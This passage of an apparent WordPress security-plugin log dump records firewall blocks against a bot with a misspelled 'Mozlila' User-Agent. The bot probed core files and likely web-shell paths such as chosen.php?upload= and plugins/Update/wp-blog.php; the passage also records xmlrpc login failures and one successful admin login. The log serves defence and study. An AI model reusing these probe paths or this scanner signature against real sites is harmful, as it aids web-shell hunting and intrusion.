User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWxpc3QtdXRpbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133691,1699888505.755613,1699888505.733700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-image-editor.php','http://eckankar-colorado.org/wp-includes/class-wp-image-editor.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWltYWdlLWVkaXRvci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133692,1699888505.393863,1699888505.385100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-image-editor-imagick.php','http://eckankar-colorado.org/wp-includes/class-wp-image-editor-imagick.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWltYWdlLWVkaXRvci1pbWFnaWNrLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133693,1699888505.031712,1699888505.022800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-image-editor-gd.php','http://eckankar-colorado.org/wp-includes/class-wp-image-editor-gd.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWltYWdlLWVkaXRvci1nZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133694,1699888504.589271,1699888504.580200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-http.php','http://eckankar-colorado.org/wp-includes/class-wp-http.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWh0dHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133695,1699888504.255328,1699888504.246700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-http-streams.php','http://eckankar-colorado.org/wp-includes/class-wp-http-streams.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWh0dHAtc3RyZWFtcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133696,1699888503.923113,1699888503.908100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-http-response.php','http://eckankar-colorado.org/wp-includes/class-wp-http-response.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWh0dHAtcmVzcG9uc2UucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133697,1699888503.366754,1699888503.358000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-http-requests-response.php','http://eckankar-colorado.org/wp-includes/class-wp-http-requests-response.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWh0dHAtcmVxdWVzdHMtcmVzcG9uc2UucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133698,1699888503.028835,1699888503.019600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-http-requests-hooks.php','http://eckankar-colorado.org/wp-includes/class-wp-http-requests-hooks.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWh0dHAtcmVxdWVzdHMtaG9va3MucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133699,1699888502.666093,1699888502.650400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-http-proxy.php','http://eckankar-colorado.org/wp-includes/class-wp-http-proxy.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWh0dHAtcHJveHkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133700,1699888502.316396,1699888502.301800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-http-ixr-client.php','http://eckankar-colorado.org/wp-includes/class-wp-http-ixr-client.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWh0dHAtaXhyLWNsaWVudC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133701,1699888501.930934,1699888501.921500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-http-encoding.php','http://eckankar-colorado.org/wp-includes/class-wp-http-encoding.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWh0dHAtZW5jb2RpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133702,1699888501.576755,1699888501.550300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-http-curl.php','http://eckankar-colorado.org/wp-includes/class-wp-http-curl.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWh0dHAtY3VybC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133703,1699888501.228765,1699888501.219500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-http-cookie.php','http://eckankar-colorado.org/wp-includes/class-wp-http-cookie.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWh0dHAtY29va2llLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133704,1699888500.896802,1699888500.888000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-hook.php','http://eckankar-colorado.org/wp-includes/class-wp-hook.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWhvb2sucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133705,1699888500.562129,1699888500.553500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-feed-cache.php','http://eckankar-colorado.org/wp-includes/class-wp-feed-cache.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWZlZWQtY2FjaGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133706,1699888500.222903,1699888500.214100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-feed-cache-transient.php','http://eckankar-colorado.org/wp-includes/class-wp-feed-cache-transient.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWZlZWQtY2FjaGUtdHJhbnNpZW50LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133707,1699888499.886973,1699888499.878000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-fatal-error-handler.php','http://eckankar-colorado.org/wp-includes/class-wp-fatal-error-handler.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWZhdGFsLWVycm9yLWhhbmRsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133708,0.000000,1699893769.578747,0x00000000000000000000FFFF5B5CF4C7,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(133709,0.000000,1699893770.300700,0x00000000000000000000FFFF5B5CF4C7,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(133710,0.000000,1699893771.018672,0x00000000000000000000FFFF5B5CF4C7,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(133711,1699900625.289703,1699900625.267800,0x00000000000000000000FFFF2E142EC6,0,403,0,0,0,'https://eckankar-colorado.org/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133712,1699906829.844637,1699906829.822600,0x00000000000000000000FFFF5B5CF6C1,0,403,0,0,0,'https://eckankar-colorado.org/chosen.php?upload=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nob3Nlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133713,1699909445.245127,1699909445.236400,0x00000000000000000000FFFFC2A9AF9E,0,403,0,0,0,'https://eckankar-colorado.org/wp-cron.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNyb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133723,1699915185.245092,1699915185.236500,0x00000000000000000000FFFFC2A9AF1F,0,403,0,0,0,'https://eckankar-colorado.org/wp-cron.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNyb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133714,1699909443.469948,1699909443.460600,0x00000000000000000000FFFFC2A9AF9E,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/Update/wp-blog.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9VcGRhdGUvd3AtYmxvZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133715,1699909441.948667,1699909441.937500,0x00000000000000000000FFFFC2A9AF9E,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/css/colors/coffee/about.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy9jb2xvcnMvY29mZmVlL2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133722,0.000000,1699914566.567936,0x00000000000000000000FFFF4C8278C6,0,302,0,2,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','loginOK',NULL,NULL),(133720,1699911489.339565,1699911489.318000,0x00000000000000000000FFFF29D8BCA2,0,403,0,0,0,'https://eckankar-colorado.org/chosen.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nob3Nlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133716,1699909440.061982,1699909440.052300,0x00000000000000000000FFFFC2A9AF9E,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/admin.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A 